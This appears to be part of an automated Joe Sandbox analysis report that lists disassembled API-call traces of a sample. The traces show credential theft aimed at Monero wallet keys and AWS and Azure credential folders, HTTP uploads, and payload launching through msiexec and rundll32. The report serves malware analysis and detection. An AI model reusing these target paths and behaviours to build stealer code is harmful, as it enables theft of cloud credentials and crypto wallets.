                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0179EDE8,00000000,?,0179A970,00000000,?,00C21A1C), ref: 00C05E71
                  • lstrlen.KERNEL32(00000000), ref: 00C05E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00C05E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C05E9A
                  • lstrlen.KERNEL32(00000000), ref: 00C05EAF
                  • lstrlen.KERNEL32(00000000), ref: 00C05ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C05EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 00C05F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C05F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00C05F4C
                  • InternetCloseHandle.WININET(00000000), ref: 00C05FB0
                  • InternetCloseHandle.WININET(00000000), ref: 00C05FBD
                  • HttpOpenRequestA.WININET(00000000,0179ED38,?,0179EC60,00000000,00000000,00400100,00000000), ref: 00C05BF8
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                  • InternetCloseHandle.WININET(00000000), ref: 00C05FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  • Opcode ID: f8894f9d185c852d0f5f6cb754ccdd07731ead5808328881d74c4f9fac202aa0
                  • Instruction ID: c02c18231c05cd3d57ff1dd74964abc9502b98e7d92abfc65b6bcd4d6eefa2fc
                  • Opcode Fuzzy Hash: f8894f9d185c852d0f5f6cb754ccdd07731ead5808328881d74c4f9fac202aa0
                  • Instruction Fuzzy Hash: 8E121A71821128ABDB15EBA0DC95FEEB378BF15710F5041A9F10672091EF706B8AEF61
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C18B60: GetSystemTime.KERNEL32(00C20E1A,0179A790,00C205AE,?,?,00C013F9,?,0000001A,00C20E1A,00000000,?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C18B86
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C0CF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C0D0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C0D0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 00C0D208
                  • lstrcat.KERNEL32(?,00C21478), ref: 00C0D217
                  • lstrcat.KERNEL32(?,00000000), ref: 00C0D22A
                  • lstrcat.KERNEL32(?,00C2147C), ref: 00C0D239
                  • lstrcat.KERNEL32(?,00000000), ref: 00C0D24C
                  • lstrcat.KERNEL32(?,00C21480), ref: 00C0D25B
                  • lstrcat.KERNEL32(?,00000000), ref: 00C0D26E
                  • lstrcat.KERNEL32(?,00C21484), ref: 00C0D27D
                  • lstrcat.KERNEL32(?,00000000), ref: 00C0D290
                  • lstrcat.KERNEL32(?,00C21488), ref: 00C0D29F
                  • lstrcat.KERNEL32(?,00000000), ref: 00C0D2B2
                  • lstrcat.KERNEL32(?,00C2148C), ref: 00C0D2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 00C0D2D4
                  • lstrcat.KERNEL32(?,00C21490), ref: 00C0D2E3
                    • Part of subcall function 00C1A820: lstrlen.KERNEL32(00C04F05,?,?,00C04F05,00C20DDE), ref: 00C1A82B
                    • Part of subcall function 00C1A820: lstrcpy.KERNEL32(00C20DDE,00000000), ref: 00C1A885
                  • lstrlen.KERNEL32(?), ref: 00C0D32A
                  • lstrlen.KERNEL32(?), ref: 00C0D339
                    • Part of subcall function 00C1AA70: StrCmpCA.SHLWAPI(01799380,00C0A7A7,?,00C0A7A7,01799380), ref: 00C1AA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 00C0D3B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  • Opcode ID: 5e84752cd136915a02756344e4ca55613a321cfa99dcc0f1464b7e0aede4515c
                  • Instruction ID: 3e50e49ca44d8c867e368ef3b44eb424f03207957c494b13e8fedea018aca278
                  • Opcode Fuzzy Hash: 5e84752cd136915a02756344e4ca55613a321cfa99dcc0f1464b7e0aede4515c
                  • Instruction Fuzzy Hash: 26E16E75851108AFDB04FBA1DD96EEE7378BF16310F144068F507B60D1DE34AA4AEBA2
                  APIs
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C04839
                    • Part of subcall function 00C047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C04849
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C04915
                  • StrCmpCA.SHLWAPI(?,0179ED68), ref: 00C0493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C04ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00C20DDB,00000000,?,?,00000000,?,",00000000,?,0179EDC8), ref: 00C04DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C04E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C04E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C04E49
                  • InternetCloseHandle.WININET(00000000), ref: 00C04EAD
                  • InternetCloseHandle.WININET(00000000), ref: 00C04EC5
                  • HttpOpenRequestA.WININET(00000000,0179ED38,?,0179EC60,00000000,00000000,00400100,00000000), ref: 00C04B15
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                  • InternetCloseHandle.WININET(00000000), ref: 00C04ECF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: eef49a77e1aaa67de200dc7c2f21af798d87f4e2443aae9685982fb0ab5ff329
                  • Instruction ID: 9f82472990702dafbcfdb5333ff479dceaf84590746998735342020b9fc85ba6
                  • Opcode Fuzzy Hash: eef49a77e1aaa67de200dc7c2f21af798d87f4e2443aae9685982fb0ab5ff329
                  • Instruction Fuzzy Hash: A712FF71911218AADB15EB90DD92FEEB378BF16310F5041A9B106720D1DF706F8AEF62
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0179E308,00000000,?,00C2144C,00000000,?,?), ref: 00C0CA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00C0CA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00C0CA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C0CAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00C0CAD9
                  • StrStrA.SHLWAPI(?,0179E4A0,00C20B52), ref: 00C0CAF7
                  • StrStrA.SHLWAPI(00000000,0179E4B8), ref: 00C0CB1E
                  • StrStrA.SHLWAPI(?,0179DCA0,00000000,?,00C21458,00000000,?,00000000,00000000,?,01799530,00000000,?,00C21454,00000000,?), ref: 00C0CCA2
                  • StrStrA.SHLWAPI(00000000,0179DA00), ref: 00C0CCB9
                    • Part of subcall function 00C0C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C0C871
                    • Part of subcall function 00C0C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C0C87C
                  • StrStrA.SHLWAPI(?,0179DA00,00000000,?,00C2145C,00000000,?,00000000,01799540), ref: 00C0CD5A
                  • StrStrA.SHLWAPI(00000000,01799210), ref: 00C0CD71
                    • Part of subcall function 00C0C820: lstrcat.KERNEL32(?,00C20B46), ref: 00C0C943
                    • Part of subcall function 00C0C820: lstrcat.KERNEL32(?,00C20B47), ref: 00C0C957
                    • Part of subcall function 00C0C820: lstrcat.KERNEL32(?,00C20B4E), ref: 00C0C978
                  • lstrlen.KERNEL32(00000000), ref: 00C0CE44
                  • CloseHandle.KERNEL32(00000000), ref: 00C0CE9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                   • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  • Opcode ID: 10d12a1afb59e468bcfe0b9f75a00251b3182c464057989e491d6c6b9582688d
                  • Instruction ID: 9f127669d3e68cbe84ac57221c15271ad5bfd7c0597f053b88bb98e3be12f696
                  • Opcode Fuzzy Hash: 10d12a1afb59e468bcfe0b9f75a00251b3182c464057989e491d6c6b9582688d
                  • Instruction Fuzzy Hash: 24E11A71911108AFDB14EBA0DD96FEEB778AF15310F044169F106B7191EF306A8BEB62
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  • RegOpenKeyExA.ADVAPI32(00000000,0179B648,00000000,00020019,00000000,00C205B6), ref: 00C183A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C18426
                  • wsprintfA.USER32 ref: 00C18459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C1847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 00C1848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00C18499
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                   • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
                  • Opcode ID: 6e9b42cb5674afdbfc27e04b19424737207c8946d3f1bcac5687bf7121d35e93
                  • Instruction ID: a0faac6c6e08b4057978e02ccaa823abd2bbd636020026784a5b47f00035b2c5
                  • Opcode Fuzzy Hash: 6e9b42cb5674afdbfc27e04b19424737207c8946d3f1bcac5687bf7121d35e93
                  • Instruction Fuzzy Hash: 95811B759511189FEB28DB50CD95FEAB7B8FB09710F008299E109A6180DF70ABCADF91
                  APIs
                    • Part of subcall function 00C18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C18E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00C14DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 00C14DCD
                    • Part of subcall function 00C14910: wsprintfA.USER32 ref: 00C1492C
                    • Part of subcall function 00C14910: FindFirstFileA.KERNEL32(?,?), ref: 00C14943
                  • lstrcat.KERNEL32(?,00000000), ref: 00C14E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 00C14E59
                    • Part of subcall function 00C14910: StrCmpCA.SHLWAPI(?,00C20FDC), ref: 00C14971
                    • Part of subcall function 00C14910: StrCmpCA.SHLWAPI(?,00C20FE0), ref: 00C14987
                    • Part of subcall function 00C14910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C14B7D
                    • Part of subcall function 00C14910: FindClose.KERNEL32(000000FF), ref: 00C14B92
                  • lstrcat.KERNEL32(?,00000000), ref: 00C14EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00C14EE5
                    • Part of subcall function 00C14910: wsprintfA.USER32 ref: 00C149B0
                    • Part of subcall function 00C14910: StrCmpCA.SHLWAPI(?,00C208D2), ref: 00C149C5
                    • Part of subcall function 00C14910: wsprintfA.USER32 ref: 00C149E2
                    • Part of subcall function 00C14910: PathMatchSpecA.SHLWAPI(?,?), ref: 00C14A1E
                    • Part of subcall function 00C14910: lstrcat.KERNEL32(?,0179ED58), ref: 00C14A4A
                    • Part of subcall function 00C14910: lstrcat.KERNEL32(?,00C20FF8), ref: 00C14A5C
                    • Part of subcall function 00C14910: lstrcat.KERNEL32(?,?), ref: 00C14A70
                    • Part of subcall function 00C14910: lstrcat.KERNEL32(?,00C20FFC), ref: 00C14A82
                    • Part of subcall function 00C14910: lstrcat.KERNEL32(?,?), ref: 00C14A96
                    • Part of subcall function 00C14910: CopyFileA.KERNEL32(?,?,00000001), ref: 00C14AAC
                    • Part of subcall function 00C14910: DeleteFileA.KERNEL32(?), ref: 00C14B31
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                   • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: 406958f6d7e16a500dd05b139fd4715156a511f177a80164e24fdacd8f10d111
                  • Instruction ID: 4aa5bfec7164a906ca6740a7a090b70c047d70f9d9bc5b9c35cbf64c076e809c
                  • Opcode Fuzzy Hash: 406958f6d7e16a500dd05b139fd4715156a511f177a80164e24fdacd8f10d111
                  • Instruction Fuzzy Hash: D74186BAA402186BD714F770EC47FED7338AB65700F444464B545660C1EEB49BCDEB92
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C1906C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                   • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: e82792211f8be8cce1056b86901926704c062a981d8fdc8a732a1d0f8adce5f7
                  • Instruction ID: aff2c2171df83ce9ad7767dc1d989a8a22f5b5430b029fe93c55993faa854784
                  • Opcode Fuzzy Hash: e82792211f8be8cce1056b86901926704c062a981d8fdc8a732a1d0f8adce5f7
                  • Instruction Fuzzy Hash: 767149B5A40208AFDB04EFE5DC98FEEB7B8FB49310F148118F515AB290DB34A945DB61
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00C131C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00C1335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00C134EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                   • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: 1c350f073c42f5726946c59e7ecf721752690e59babaf62850720d0bc3154050
                  • Instruction ID: 30eebec381a869c8db244fd4e0ed375cb01c777db1556a6495378ed3e53e3f75
